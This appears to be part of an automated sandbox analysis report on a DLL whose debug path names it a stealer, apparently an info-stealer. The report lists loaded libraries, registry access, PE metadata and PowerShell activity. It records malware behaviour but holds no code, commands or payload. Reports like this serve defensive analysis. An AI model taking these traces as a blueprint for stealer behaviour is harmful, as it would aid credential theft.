    Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\OfficeJump to behavior
    Source: mU3Ob2XcCt.dllStatic PE information: Image base 0x180000000 > 0x60000000
    Source: mU3Ob2XcCt.dllStatic file information: File size 1267200 > 1048576
    Source: mU3Ob2XcCt.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: mU3Ob2XcCt.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: mU3Ob2XcCt.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: mU3Ob2XcCt.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: mU3Ob2XcCt.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: mU3Ob2XcCt.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: mU3Ob2XcCt.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: mU3Ob2XcCt.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: rlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.1928165981.000002075CEE2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: {(n.pdby source: powershell.exe, 00000009.00000002.1910398664.000002075CD94000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2020625808.00000275F1E4C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000012.00000002.2014326484.00000275F1A90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020625808.00000275F1E4C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbzL source: powershell.exe, 00000012.00000002.2020625808.00000275F1E5F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbTp source: powershell.exe, 00000012.00000002.2020625808.00000275F1E4C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb) source: powershell.exe, 00000009.00000002.1926623428.000002075CEB5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: HCore.pdb source: powershell.exe, 00000012.00000002.2020625808.00000275F1E5F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbattB{H source: powershell.exe, 00000009.00000002.1915097945.000002075CE69000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Target.pdbons@ source: powershell.exe, 00000012.00000002.2018733030.00000275F1DD4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdb& source: powershell.exe, 00000012.00000002.2018170222.00000275F1DBE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tem.Core.pdb source: powershell.exe, 00000012.00000002.2020625808.00000275F1E5F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: softy.pdbt source: powershell.exe, 00000009.00000002.1915097945.000002075CE69000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: &D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: mU3Ob2XcCt.dll
    Source: Binary string: System.Core.pdb source: powershell.exe, 00000012.00000002.2020625808.00000275F1E4C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1915097945.000002075CE2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020625808.00000275F1E4C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: mU3Ob2XcCt.dll
    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.1910398664.000002075CD94000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rlib.pdb source: powershell.exe, 00000009.00000002.1903432484.000002075CB46000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: l\mscorlib.pdb source: powershell.exe, 00000009.00000002.1928165981.000002075CEE2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdberShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.1915097945.000002075CE2C000.00000004.00000020.00020000.00000000.sdmp
    Source: mU3Ob2XcCt.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: mU3Ob2XcCt.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: mU3Ob2XcCt.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: mU3Ob2XcCt.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: mU3Ob2XcCt.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: mU3Ob2XcCt.dllStatic PE information: section name: _RDATA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B319A10 push ds; ret 9_2_00007FFD9B319A11
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B3EC2E4 pushfd ; retn 0000h9_2_00007FFD9B3EC2E5
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B3EC2E0 pushfd ; retn 0000h9_2_00007FFD9B3EC2E1

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
